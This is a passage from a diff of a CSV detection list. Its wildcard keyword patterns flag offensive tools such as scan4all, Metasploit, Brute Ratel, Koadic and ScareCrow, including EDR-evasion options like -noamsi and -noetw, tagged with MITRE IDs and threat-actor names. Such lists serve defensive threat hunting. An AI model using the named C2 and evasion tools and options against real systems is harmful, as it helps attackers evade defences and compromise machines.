Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_*.*_windows_amd64.zip*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_windows_386.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all_windows_amd64.exe*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*scan4all-main*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 
90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*scanless*","offensive_tool_keyword","scanless","This is a Python 3 command-line utility and library for using websites that can perform port scans on your behalf","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0008","N/A","N/A","Information Gathering","https://github.com/vesche/scanless","1","0","N/A","N/A","10","1073","176","2023-08-07T15:12:42Z","2017-05-05T02:53:01Z" -"*scanner/backdoor*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*scanner/backdoor*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*scannerport.go -*","offensive_tool_keyword","GONET-Scanner","port scanner and arp discover in go","T1595","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/luijait/GONET-Scanner","1","0","N/A","N/A","1","72","18","2022-03-10T04:35:58Z","2022-02-02T19:39:09Z" -"*Scanners-Box*","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7644","2353","2023-08-09T07:09:32Z","2016-12-24T16:07:50Z" +"*Scanners-Box*","offensive_tool_keyword","Scanners-Box","Scanners Box also known as scanbox. is a powerful hacker toolkit. 
which has collected more than 10 categories of open source scanners from Github. including subdomain. database. middleware and other modular design scanner etc. But for other Well-known scanning tools. such as nmap. w3af. brakeman. arachni. nikto. metasploit. aircrack-ng will not be included in the scope of collection.","T1190 - T1210.001 - T1595 - T1192","TA0007 - TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/We5ter/Scanners-Box","1","0","N/A","N/A","10","7647","2353","2023-08-09T07:09:32Z","2016-12-24T16:07:50Z" "*ScanProcessForBadgerConfig*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*ScanTCPImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*ScareCrow *-loader *","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -encryptionmode *","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -Evasion*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -Exec*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 
T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -injection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -Loader * ","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -noamsi*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group 
- APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -noetw*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow* -obfu*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","0","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*_darwin_amd64*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*_windows_amd64.exe*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*KnownDLL*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*ProcessInjection*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow*windows_amd64.exe*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR 
bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","437","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" -"*ScareCrow.go*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/Cryptor*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 
- T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2580","458","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" -"*ScareCrow/limelighter*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
